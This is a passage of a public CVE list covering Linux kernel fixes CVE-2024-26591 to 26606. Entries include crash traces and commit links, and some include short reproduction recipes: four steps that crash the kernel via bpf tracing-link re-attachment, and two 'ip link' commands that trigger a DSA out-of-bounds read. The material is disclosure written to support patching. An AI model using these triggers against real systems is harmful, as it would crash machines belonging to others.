URL:https://git.kernel.org/stable/c/56f96cf6eb11a1c2d594367c3becbfb06a855ec1 | MISC:https://git.kernel.org/stable/c/e0f83c234ea7a3dec1f84e5d02caa1c51664a076 | URL:https://git.kernel.org/stable/c/e0f83c234ea7a3dec1f84e5d02caa1c51664a076 Assigned (20240219)
CVE 2024 26606 Candidate In the Linux kernel, the following vulnerability has been resolved: binder: signal epoll threads of self-work In (e)poll mode, threads often depend on I/O events to determine when data is ready for consumption. Within binder, a thread may initiate a command via BINDER_WRITE_READ without a read buffer and then make use of epoll_wait() or similar to consume any responses afterwards. It is then crucial that epoll threads are signaled via wakeup when they queue their own work. Otherwise, they risk waiting indefinitely for an event leaving their work unhandled. What is worse, subsequent commands won't trigger a wakeup either as the thread has pending work. MISC:https://git.kernel.org/stable/c/42beab162dcee1e691ee4934292d51581c29df61 | URL:https://git.kernel.org/stable/c/42beab162dcee1e691ee4934292d51581c29df61 | MISC:https://git.kernel.org/stable/c/82722b453dc2f967b172603e389ee7dc1b3137cc | URL:https://git.kernel.org/stable/c/82722b453dc2f967b172603e389ee7dc1b3137cc | MISC:https://git.kernel.org/stable/c/90e09c016d72b91e76de25f71c7b93d94cc3c769 | URL:https://git.kernel.org/stable/c/90e09c016d72b91e76de25f71c7b93d94cc3c769 | MISC:https://git.kernel.org/stable/c/93b372c39c40cbf179e56621e6bc48240943af69 | URL:https://git.kernel.org/stable/c/93b372c39c40cbf179e56621e6bc48240943af69 | MISC:https://git.kernel.org/stable/c/97830f3c3088638ff90b20dfba2eb4d487bf14d7 | URL:https://git.kernel.org/stable/c/97830f3c3088638ff90b20dfba2eb4d487bf14d7 | MISC:https://git.kernel.org/stable/c/a423042052ec2bdbf1e552e621e6a768922363cc | URL:https://git.kernel.org/stable/c/a423042052ec2bdbf1e552e621e6a768922363cc | MISC:https://git.kernel.org/stable/c/a7ae586f6f6024f490b8546c8c84670f96bb9b68 | URL:https://git.kernel.org/stable/c/a7ae586f6f6024f490b8546c8c84670f96bb9b68 | MISC:https://git.kernel.org/stable/c/dd64bb8329ce0ea27bc557e4160c2688835402ac | URL:https://git.kernel.org/stable/c/dd64bb8329ce0ea27bc557e4160c2688835402ac Assigned (20240219)
CVE 2024 26605 Candidate In the Linux kernel, the following vulnerability has been resolved: PCI/ASPM: Fix deadlock when enabling ASPM A last minute revert in 6.7-final introduced a potential deadlock when enabling ASPM during probe of Qualcomm PCIe controllers as reported by lockdep: ============================================ WARNING: possible recursive locking detected 6.7.0 #40 Not tainted -------------------------------------------- kworker/u16:5/90 is trying to acquire lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pcie_aspm_pm_state_change+0x58/0xdc but task is already holding lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pci_walk_bus+0x34/0xbc other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(pci_bus_sem); lock(pci_bus_sem); *** DEADLOCK *** Call trace: print_deadlock_bug+0x25c/0x348 __lock_acquire+0x10a4/0x2064 lock_acquire+0x1e8/0x318 down_read+0x60/0x184 pcie_aspm_pm_state_change+0x58/0xdc pci_set_full_power_state+0xa8/0x114 pci_set_power_state+0xc4/0x120 qcom_pcie_enable_aspm+0x1c/0x3c [pcie_qcom] pci_walk_bus+0x64/0xbc qcom_pcie_host_post_init_2_7_0+0x28/0x34 [pcie_qcom] The deadlock can easily be reproduced on machines like the Lenovo ThinkPad X13s by adding a delay to increase the race window during asynchronous probe where another thread can take a write lock. Add a new pci_set_power_state_locked() and associated helper functions that can be called with the PCI bus semaphore held to avoid taking the read lock twice. MISC:https://git.kernel.org/stable/c/1e560864159d002b453da42bd2c13a1805515a20 | URL:https://git.kernel.org/stable/c/1e560864159d002b453da42bd2c13a1805515a20 | MISC:https://git.kernel.org/stable/c/ef90508574d7af48420bdc5f7b9a4f1cdd26bc70 | URL:https://git.kernel.org/stable/c/ef90508574d7af48420bdc5f7b9a4f1cdd26bc70 Assigned (20240219)
CVE 2024 26604 Candidate In the Linux kernel, the following vulnerability has been resolved: Revert "kobject: Remove redundant checks for whether ktype is NULL" This reverts commit 1b28cb81dab7c1eedc6034206f4e8d644046ad31. It is reported to cause problems, so revert it for now until the root cause can be found. MISC:https://git.kernel.org/stable/c/3ca8fbabcceb8bfe44f7f50640092fd8f1de375c | URL:https://git.kernel.org/stable/c/3ca8fbabcceb8bfe44f7f50640092fd8f1de375c | MISC:https://git.kernel.org/stable/c/7f414d306320f837cc3df96cf52161cb8290fb1b | URL:https://git.kernel.org/stable/c/7f414d306320f837cc3df96cf52161cb8290fb1b | MISC:https://git.kernel.org/stable/c/b746d52ce7bcac325a2fa264216ead85b7fbbfaa | URL:https://git.kernel.org/stable/c/b746d52ce7bcac325a2fa264216ead85b7fbbfaa Assigned (20240219)
CVE 2024 26603 Candidate In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Stop relying on userspace for info to fault in xsave buffer Before this change, the expected size of the user space buffer was taken from fx_sw->xstate_size. fx_sw->xstate_size can be changed from user-space, so it is possible construct a sigreturn frame where: * fx_sw->xstate_size is smaller than the size required by valid bits in fx_sw->xfeatures. * user-space unmaps parts of the sigrame fpu buffer so that not all of the buffer required by xrstor is accessible. In this case, xrstor tries to restore and accesses the unmapped area which results in a fault. But fault_in_readable succeeds because buf + fx_sw->xstate_size is within the still mapped area, so it goes back and tries xrstor again. It will spin in this loop forever. Instead, fault in the maximum size which can be touched by XRSTOR (taken from fpstate->user_size). [ dhansen: tweak subject / changelog ] MISC:https://git.kernel.org/stable/c/627339cccdc9166792ecf96bc3c9f711a60ce996 | URL:https://git.kernel.org/stable/c/627339cccdc9166792ecf96bc3c9f711a60ce996 | MISC:https://git.kernel.org/stable/c/627e28cbb65564e55008315d9e02fbb90478beda | URL:https://git.kernel.org/stable/c/627e28cbb65564e55008315d9e02fbb90478beda | MISC:https://git.kernel.org/stable/c/8bd3eee7720c14b59a206bd05b98d7586bccf99a | URL:https://git.kernel.org/stable/c/8bd3eee7720c14b59a206bd05b98d7586bccf99a | MISC:https://git.kernel.org/stable/c/b2479ab426cef7ab79a13005650eff956223ced2 | URL:https://git.kernel.org/stable/c/b2479ab426cef7ab79a13005650eff956223ced2 | MISC:https://git.kernel.org/stable/c/d877550eaf2dc9090d782864c96939397a3c6835 | URL:https://git.kernel.org/stable/c/d877550eaf2dc9090d782864c96939397a3c6835 Assigned (20240219)
CVE 2024 26602 Candidate In the Linux kernel, the following vulnerability has been resolved: sched/membarrier: reduce the ability to hammer on sys_membarrier On some systems, sys_membarrier can be very expensive, causing overall slowdowns for everything. So put a lock on the path in order to serialize the accesses to prevent the ability for this to be called at too high of a frequency and saturate the machine. MISC:https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265 | URL:https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265 | MISC:https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a | URL:https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a | MISC:https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3 | URL:https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3 | MISC:https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee | URL:https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee | MISC:https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23 | URL:https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23 | MISC:https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71 | URL:https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71 | MISC:https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea | URL:https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea | MISC:https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6 | URL:https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6 Assigned (20240219)
CVE 2024 26601 Candidate In the Linux kernel, the following vulnerability has been resolved: ext4: regenerate buddy after block freeing failed if under fc replay This mostly reverts commit 6bd97bf273bd ("ext4: remove redundant mb_regenerate_buddy()") and reintroduces mb_regenerate_buddy(). Based on code in mb_free_blocks(), fast commit replay can end up marking as free blocks that are already marked as such. This causes corruption of the buddy bitmap so we need to regenerate it in that case. MISC:https://git.kernel.org/stable/c/6b0d48647935e4b8c7b75d1eccb9043fcd4ee581 | URL:https://git.kernel.org/stable/c/6b0d48647935e4b8c7b75d1eccb9043fcd4ee581 | MISC:https://git.kernel.org/stable/c/78327acd4cdc4a1601af718b781eece577b6b7d4 | URL:https://git.kernel.org/stable/c/78327acd4cdc4a1601af718b781eece577b6b7d4 | MISC:https://git.kernel.org/stable/c/94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a | URL:https://git.kernel.org/stable/c/94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a | MISC:https://git.kernel.org/stable/c/c1317822e2de80e78f137d3a2d99febab1b80326 | URL:https://git.kernel.org/stable/c/c1317822e2de80e78f137d3a2d99febab1b80326 | MISC:https://git.kernel.org/stable/c/c9b528c35795b711331ed36dc3dbee90d5812d4e | URL:https://git.kernel.org/stable/c/c9b528c35795b711331ed36dc3dbee90d5812d4e | MISC:https://git.kernel.org/stable/c/ea42d6cffb0dd27a417f410b9d0011e9859328cb | URL:https://git.kernel.org/stable/c/ea42d6cffb0dd27a417f410b9d0011e9859328cb Assigned (20240219)
CVE 2024 26600 Candidate In the Linux kernel, the following vulnerability has been resolved: phy: ti: phy-omap-usb2: Fix NULL pointer dereference for SRP If the external phy working together with phy-omap-usb2 does not implement send_srp(), we may still attempt to call it. This can happen on an idle Ethernet gadget triggering a wakeup for example: configfs-gadget.g1 gadget.0: ECM Suspend configfs-gadget.g1 gadget.0: Port suspended. Triggering wakeup ... Unable to handle kernel NULL pointer dereference at virtual address 00000000 when execute ... PC is at 0x0 LR is at musb_gadget_wakeup+0x1d4/0x254 [musb_hdrc] ... musb_gadget_wakeup [musb_hdrc] from usb_gadget_wakeup+0x1c/0x3c [udc_core] usb_gadget_wakeup [udc_core] from eth_start_xmit+0x3b0/0x3d4 [u_ether] eth_start_xmit [u_ether] from dev_hard_start_xmit+0x94/0x24c dev_hard_start_xmit from sch_direct_xmit+0x104/0x2e4 sch_direct_xmit from __dev_queue_xmit+0x334/0xd88 __dev_queue_xmit from arp_solicit+0xf0/0x268 arp_solicit from neigh_probe+0x54/0x7c neigh_probe from __neigh_event_send+0x22c/0x47c __neigh_event_send from neigh_resolve_output+0x14c/0x1c0 neigh_resolve_output from ip_finish_output2+0x1c8/0x628 ip_finish_output2 from ip_send_skb+0x40/0xd8 ip_send_skb from udp_send_skb+0x124/0x340 udp_send_skb from udp_sendmsg+0x780/0x984 udp_sendmsg from __sys_sendto+0xd8/0x158 __sys_sendto from ret_fast_syscall+0x0/0x58 Let's fix the issue by checking for send_srp() and set_vbus() before calling them. For USB peripheral only cases these both could be NULL. MISC:https://git.kernel.org/stable/c/0430bfcd46657d9116a26cd377f112cbc40826a4 | URL:https://git.kernel.org/stable/c/0430bfcd46657d9116a26cd377f112cbc40826a4 | MISC:https://git.kernel.org/stable/c/14ef61594a5a286ae0d493b8acbf9eac46fd04c4 | URL:https://git.kernel.org/stable/c/14ef61594a5a286ae0d493b8acbf9eac46fd04c4 | MISC:https://git.kernel.org/stable/c/396e17af6761b3cc9e6e4ca94b4de7f642bfece1 | URL:https://git.kernel.org/stable/c/396e17af6761b3cc9e6e4ca94b4de7f642bfece1 | MISC:https://git.kernel.org/stable/c/486218c11e8d1c8f515a3bdd70d62203609d4b6b | URL:https://git.kernel.org/stable/c/486218c11e8d1c8f515a3bdd70d62203609d4b6b | MISC:https://git.kernel.org/stable/c/7104ba0f1958adb250319e68a15eff89ec4fd36d | URL:https://git.kernel.org/stable/c/7104ba0f1958adb250319e68a15eff89ec4fd36d | MISC:https://git.kernel.org/stable/c/8398d8d735ee93a04fb9e9f490e8cacd737e3bf5 | URL:https://git.kernel.org/stable/c/8398d8d735ee93a04fb9e9f490e8cacd737e3bf5 | MISC:https://git.kernel.org/stable/c/8cc889b9dea0579726be9520fcc766077890b462 | URL:https://git.kernel.org/stable/c/8cc889b9dea0579726be9520fcc766077890b462 | MISC:https://git.kernel.org/stable/c/be3b82e4871ba00e9b5d0ede92d396d579d7b3b3 | URL:https://git.kernel.org/stable/c/be3b82e4871ba00e9b5d0ede92d396d579d7b3b3 Assigned (20240219)
CVE 2024 26599 Candidate In the Linux kernel, the following vulnerability has been resolved: pwm: Fix out-of-bounds access in of_pwm_single_xlate() With args->args_count == 2 args->args[2] is not defined. Actually the flags are contained in args->args[1]. MISC:https://git.kernel.org/stable/c/7b85554c7c2aee91171e038e4d5442ffa130b282 | URL:https://git.kernel.org/stable/c/7b85554c7c2aee91171e038e4d5442ffa130b282 | MISC:https://git.kernel.org/stable/c/a297d07b9a1e4fb8cda25a4a2363a507d294b7c9 | URL:https://git.kernel.org/stable/c/a297d07b9a1e4fb8cda25a4a2363a507d294b7c9 | MISC:https://git.kernel.org/stable/c/bae45b7ebb31984b63b13c3519fd724b3ce92123 | URL:https://git.kernel.org/stable/c/bae45b7ebb31984b63b13c3519fd724b3ce92123 | MISC:https://git.kernel.org/stable/c/e5f2b4b62977fb6c2efcbc5779e0c9dce18215f7 | URL:https://git.kernel.org/stable/c/e5f2b4b62977fb6c2efcbc5779e0c9dce18215f7 Assigned (20240219)
CVE 2024 26598 Candidate In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: vgic-its: Avoid potential UAF in LPI translation cache There is a potential UAF scenario in the case of an LPI translation cache hit racing with an operation that invalidates the cache, such as a DISCARD ITS command. The root of the problem is that vgic_its_check_cache() does not elevate the refcount on the vgic_irq before dropping the lock that serializes refcount changes. Have vgic_its_check_cache() raise the refcount on the returned vgic_irq and add the corresponding decrement after queueing the interrupt. MISC:https://git.kernel.org/stable/c/12c2759ab1343c124ed46ba48f27bd1ef5d2dff4 | URL:https://git.kernel.org/stable/c/12c2759ab1343c124ed46ba48f27bd1ef5d2dff4 | MISC:https://git.kernel.org/stable/c/65b201bf3e9af1b0254243a5881390eda56f72d1 | URL:https://git.kernel.org/stable/c/65b201bf3e9af1b0254243a5881390eda56f72d1 | MISC:https://git.kernel.org/stable/c/ad362fe07fecf0aba839ff2cc59a3617bd42c33f | URL:https://git.kernel.org/stable/c/ad362fe07fecf0aba839ff2cc59a3617bd42c33f | MISC:https://git.kernel.org/stable/c/ba7be666740847d967822bed15500656b26bc703 | URL:https://git.kernel.org/stable/c/ba7be666740847d967822bed15500656b26bc703 | MISC:https://git.kernel.org/stable/c/d04acadb6490aa3314f9c9e087691e55de153b88 | URL:https://git.kernel.org/stable/c/d04acadb6490aa3314f9c9e087691e55de153b88 | MISC:https://git.kernel.org/stable/c/dba788e25f05209adf2b0175eb1691dc89fb1ba6 | URL:https://git.kernel.org/stable/c/dba788e25f05209adf2b0175eb1691dc89fb1ba6 | MISC:https://git.kernel.org/stable/c/dd3956a1b3dd11f46488c928cb890d6937d1ca80 | URL:https://git.kernel.org/stable/c/dd3956a1b3dd11f46488c928cb890d6937d1ca80 Assigned (20240219)
CVE 2024 26597 Candidate In the Linux kernel, the following vulnerability has been resolved: net: qualcomm: rmnet: fix global oob in rmnet_policy The variable rmnet_link_ops assign a *bigger* maxtype which leads to a global out-of-bounds read when parsing the netlink attributes. See bug trace below: ================================================================== BUG: KASAN: global-out-of-bounds in validate_nla lib/nlattr.c:386 [inline] BUG: KASAN: global-out-of-bounds in __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 Read of size 1 at addr ffffffff92c438d0 by task syz-executor.6/84207 CPU: 0 PID: 84207 Comm: syz-executor.6 Tainted: G N 6.1.0 #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x8b/0xb3 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:284 [inline] print_report+0x172/0x475 mm/kasan/report.c:395 kasan_report+0xbb/0x1c0 mm/kasan/report.c:495 validate_nla lib/nlattr.c:386 [inline] __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 __nla_parse+0x3e/0x50 lib/nlattr.c:697 nla_parse_nested_deprecated include/net/netlink.h:1248 [inline] __rtnl_newlink+0x50a/0x1880 net/core/rtnetlink.c:3485 rtnl_newlink+0x64/0xa0 net/core/rtnetlink.c:3594 rtnetlink_rcv_msg+0x43c/0xd70 net/core/rtnetlink.c:6091 netlink_rcv_skb+0x14f/0x410 net/netlink/af_netlink.c:2540 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline] netlink_unicast+0x54e/0x800 net/netlink/af_netlink.c:1345 netlink_sendmsg+0x930/0xe50 net/netlink/af_netlink.c:1921 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg+0x154/0x190 net/socket.c:734 ____sys_sendmsg+0x6df/0x840 net/socket.c:2482 ___sys_sendmsg+0x110/0x1b0 net/socket.c:2536 __sys_sendmsg+0xf3/0x1c0 net/socket.c:2565 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7fdcf2072359 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 19 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fdcf13e3168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007fdcf219ff80 RCX: 00007fdcf2072359 RDX: 0000000000000000 RSI: 0000000020000200 RDI: 0000000000000003 RBP: 00007fdcf20bd493 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007fffbb8d7bdf R14: 00007fdcf13e3300 R15: 0000000000022000 </TASK> The buggy address belongs to the variable: rmnet_policy+0x30/0xe0 The buggy address belongs to the physical page: page:0000000065bdeb3c refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x155243 flags: 0x200000000001000(reserved|node=0|zone=2) raw: 0200000000001000 ffffea00055490c8 ffffea00055490c8 0000000000000000 raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffffffff92c43780: f9 f9 f9 f9 00 00 00 02 f9 f9 f9 f9 00 00 00 07 ffffffff92c43800: f9 f9 f9 f9 00 00 00 05 f9 f9 f9 f9 06 f9 f9 f9 >ffffffff92c43880: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 ^ ffffffff92c43900: 00 00 00 00 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 ffffffff92c43980: 00 00 00 07 f9 f9 f9 f9 00 00 00 05 f9 f9 f9 f9 According to the comment of `nla_parse_nested_deprecated`, the maxtype should be len(destination array) - 1. Hence use `IFLA_RMNET_MAX` here. MISC:https://git.kernel.org/stable/c/02467ab8b404d80429107588e0f3425cf5fcd2e5 | URL:https://git.kernel.org/stable/c/02467ab8b404d80429107588e0f3425cf5fcd2e5 | MISC:https://git.kernel.org/stable/c/093dab655808207f7a9f54cf156240aeafc70590 | URL:https://git.kernel.org/stable/c/093dab655808207f7a9f54cf156240aeafc70590 | MISC:https://git.kernel.org/stable/c/17d06a5c44d8fd2e8e61bac295b09153496f87e1 | URL:https://git.kernel.org/stable/c/17d06a5c44d8fd2e8e61bac295b09153496f87e1 | MISC:https://git.kernel.org/stable/c/2295c22348faf795e1ccdf618f6eb7afdb2f7447 | URL:https://git.kernel.org/stable/c/2295c22348faf795e1ccdf618f6eb7afdb2f7447 | MISC:https://git.kernel.org/stable/c/3b5254862258b595662a0ccca6e9eeb88d6e7468 | URL:https://git.kernel.org/stable/c/3b5254862258b595662a0ccca6e9eeb88d6e7468 | MISC:https://git.kernel.org/stable/c/b33fb5b801c6db408b774a68e7c8722796b59ecc | URL:https://git.kernel.org/stable/c/b33fb5b801c6db408b774a68e7c8722796b59ecc | MISC:https://git.kernel.org/stable/c/c4734535034672f59f2652e1e0058c490da62a5c | URL:https://git.kernel.org/stable/c/c4734535034672f59f2652e1e0058c490da62a5c | MISC:https://git.kernel.org/stable/c/ee1dc3bf86f2df777038506b139371a9add02534 | URL:https://git.kernel.org/stable/c/ee1dc3bf86f2df777038506b139371a9add02534 Assigned (20240219)
CVE 2024 26596 Candidate In the Linux kernel, the following vulnerability has been resolved: net: dsa: fix netdev_priv() dereference before check on non-DSA netdevice events After the blamed commit, we started doing this dereference for every NETDEV_CHANGEUPPER and NETDEV_PRECHANGEUPPER event in the system. static inline struct dsa_port *dsa_user_to_port(const struct net_device *dev) { struct dsa_user_priv *p = netdev_priv(dev); return p->dp; } Which is obviously bogus, because not all net_devices have a netdev_priv() of type struct dsa_user_priv. But struct dsa_user_priv is fairly small, and p->dp means dereferencing 8 bytes starting with offset 16. Most drivers allocate that much private memory anyway, making our access not fault, and we discard the bogus data quickly afterwards, so this wasn't caught. But the dummy interface is somewhat special in that it calls alloc_netdev() with a priv size of 0. So every netdev_priv() dereference is invalid, and we get this when we emit a NETDEV_PRECHANGEUPPER event with a VLAN as its new upper: $ ip link add dummy1 type dummy $ ip link add link dummy1 name dummy1.100 type vlan id 100 [ 43.309174] ================================================================== [ 43.316456] BUG: KASAN: slab-out-of-bounds in dsa_user_prechangeupper+0x30/0xe8 [ 43.323835] Read of size 8 at addr ffff3f86481d2990 by task ip/374 [ 43.330058] [ 43.342436] Call trace: [ 43.366542] dsa_user_prechangeupper+0x30/0xe8 [ 43.371024] dsa_user_netdevice_event+0xb38/0xee8 [ 43.375768] notifier_call_chain+0xa4/0x210 [ 43.379985] raw_notifier_call_chain+0x24/0x38 [ 43.384464] __netdev_upper_dev_link+0x3ec/0x5d8 [ 43.389120] netdev_upper_dev_link+0x70/0xa8 [ 43.393424] register_vlan_dev+0x1bc/0x310 [ 43.397554] vlan_newlink+0x210/0x248 [ 43.401247] rtnl_newlink+0x9fc/0xe30 [ 43.404942] rtnetlink_rcv_msg+0x378/0x580 Avoid the kernel oops by dereferencing after the type check, as customary. MISC:https://git.kernel.org/stable/c/844f104790bd69c2e4dbb9ee3eba46fde1fcea7b | URL:https://git.kernel.org/stable/c/844f104790bd69c2e4dbb9ee3eba46fde1fcea7b | MISC:https://git.kernel.org/stable/c/dbd909c20c11f0d29c0054d41e0d1f668a60e8c8 | URL:https://git.kernel.org/stable/c/dbd909c20c11f0d29c0054d41e0d1f668a60e8c8 Assigned (20240219)
CVE 2024 26595 Candidate In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix NULL pointer dereference in error path When calling mlxsw_sp_acl_tcam_region_destroy() from an error path after failing to attach the region to an ACL group, we hit a NULL pointer dereference upon 'region->group->tcam' [1]. Fix by retrieving the 'tcam' pointer using mlxsw_sp_acl_to_tcam(). [1] BUG: kernel NULL pointer dereference, address: 0000000000000000 [...] RIP: 0010:mlxsw_sp_acl_tcam_region_destroy+0xa0/0xd0 [...] Call Trace: mlxsw_sp_acl_tcam_vchunk_get+0x88b/0xa20 mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0 mlxsw_sp_acl_rule_add+0x47/0x240 mlxsw_sp_flower_replace+0x1a9/0x1d0 tc_setup_cb_add+0xdc/0x1c0 fl_hw_replace_filter+0x146/0x1f0 fl_change+0xc17/0x1360 tc_new_tfilter+0x472/0xb90 rtnetlink_rcv_msg+0x313/0x3b0 netlink_rcv_skb+0x58/0x100 netlink_unicast+0x244/0x390 netlink_sendmsg+0x1e4/0x440 ____sys_sendmsg+0x164/0x260 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xc0 do_syscall_64+0x40/0xe0 entry_SYSCALL_64_after_hwframe+0x63/0x6b MISC:https://git.kernel.org/stable/c/817840d125a370626895df269c50c923b79b0a39 | URL:https://git.kernel.org/stable/c/817840d125a370626895df269c50c923b79b0a39 | MISC:https://git.kernel.org/stable/c/d0a1efe417c97a1e9b914056ee6b86f1ef75fe1f | URL:https://git.kernel.org/stable/c/d0a1efe417c97a1e9b914056ee6b86f1ef75fe1f | MISC:https://git.kernel.org/stable/c/efeb7dfea8ee10cdec11b6b6ba4e405edbe75809 | URL:https://git.kernel.org/stable/c/efeb7dfea8ee10cdec11b6b6ba4e405edbe75809 Assigned (20240219)
CVE 2024 26594 Candidate In the Linux kernel, the following vulnerability has been resolved: ksmbd: validate mech token in session setup If client send invalid mech token in session setup request, ksmbd validate and make the error if it is invalid. MISC:https://git.kernel.org/stable/c/5e6dfec95833edc54c48605a98365a7325e5541e | URL:https://git.kernel.org/stable/c/5e6dfec95833edc54c48605a98365a7325e5541e | MISC:https://git.kernel.org/stable/c/6eb8015492bcc84e40646390e50a862b2c0529c9 | URL:https://git.kernel.org/stable/c/6eb8015492bcc84e40646390e50a862b2c0529c9 | MISC:https://git.kernel.org/stable/c/92e470163d96df8db6c4fa0f484e4a229edb903d | URL:https://git.kernel.org/stable/c/92e470163d96df8db6c4fa0f484e4a229edb903d | MISC:https://git.kernel.org/stable/c/a2b21ef1ea4cf632d19b3a7cc4d4245b8e63202a | URL:https://git.kernel.org/stable/c/a2b21ef1ea4cf632d19b3a7cc4d4245b8e63202a | MISC:https://git.kernel.org/stable/c/dd1de9268745f0eac83a430db7afc32cbd62e84b | URL:https://git.kernel.org/stable/c/dd1de9268745f0eac83a430db7afc32cbd62e84b Assigned (20240219)
CVE 2024 26593 Candidate In the Linux kernel, the following vulnerability has been resolved: i2c: i801: Fix block process call transactions According to the Intel datasheets, software must reset the block buffer index twice for block process call transactions: once before writing the outgoing data to the buffer, and once again before reading the incoming data from the buffer. The driver is currently missing the second reset, causing the wrong portion of the block buffer to be read. MISC:https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a | URL:https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a | MISC:https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c | URL:https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c | MISC:https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2 | URL:https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2 | MISC:https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9 | URL:https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9 | MISC:https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f | URL:https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f | MISC:https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21 | URL:https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21 | MISC:https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7 | URL:https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7 Assigned (20240219)
CVE 2024 26592 Candidate In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix UAF issue in ksmbd_tcp_new_connection() The race is between the handling of a new TCP connection and its disconnection. It leads to UAF on `struct tcp_transport` in ksmbd_tcp_new_connection() function. MISC:https://git.kernel.org/stable/c/24290ba94cd0136e417283b0dbf8fcdabcf62111 | URL:https://git.kernel.org/stable/c/24290ba94cd0136e417283b0dbf8fcdabcf62111 | MISC:https://git.kernel.org/stable/c/380965e48e9c32ee4263c023e1d830ea7e462ed1 | URL:https://git.kernel.org/stable/c/380965e48e9c32ee4263c023e1d830ea7e462ed1 | MISC:https://git.kernel.org/stable/c/38d20c62903d669693a1869aa68c4dd5674e2544 | URL:https://git.kernel.org/stable/c/38d20c62903d669693a1869aa68c4dd5674e2544 | MISC:https://git.kernel.org/stable/c/69d54650b751532d1e1613a4fb433e591aeef126 | URL:https://git.kernel.org/stable/c/69d54650b751532d1e1613a4fb433e591aeef126 | MISC:https://git.kernel.org/stable/c/999daf367b924fdf14e9d83e034ee0f86bc17ec6 | URL:https://git.kernel.org/stable/c/999daf367b924fdf14e9d83e034ee0f86bc17ec6 Assigned (20240219)
CVE 2024 26591 Candidate In the Linux kernel, the following vulnerability has been resolved: bpf: Fix re-attachment branch in bpf_tracing_prog_attach The following case can cause a crash due to missing attach_btf: 1) load rawtp program 2) load fentry program with rawtp as target_fd 3) create tracing link for fentry program with target_fd = 0 4) repeat 3 In the end we have: - prog->aux->dst_trampoline == NULL - tgt_prog == NULL (because we did not provide target_fd to link_create) - prog->aux->attach_btf == NULL (the program was loaded with attach_prog_fd=X) - the program was loaded for tgt_prog but we have no way to find out which one BUG: kernel NULL pointer dereference, address: 0000000000000058 Call Trace: <TASK> ? __die+0x20/0x70 ? page_fault_oops+0x15b/0x430 ? fixup_exception+0x22/0x330 ? exc_page_fault+0x6f/0x170 ? asm_exc_page_fault+0x22/0x30 ? bpf_tracing_prog_attach+0x279/0x560 ? btf_obj_id+0x5/0x10 bpf_tracing_prog_attach+0x439/0x560 __sys_bpf+0x1cf4/0x2de0 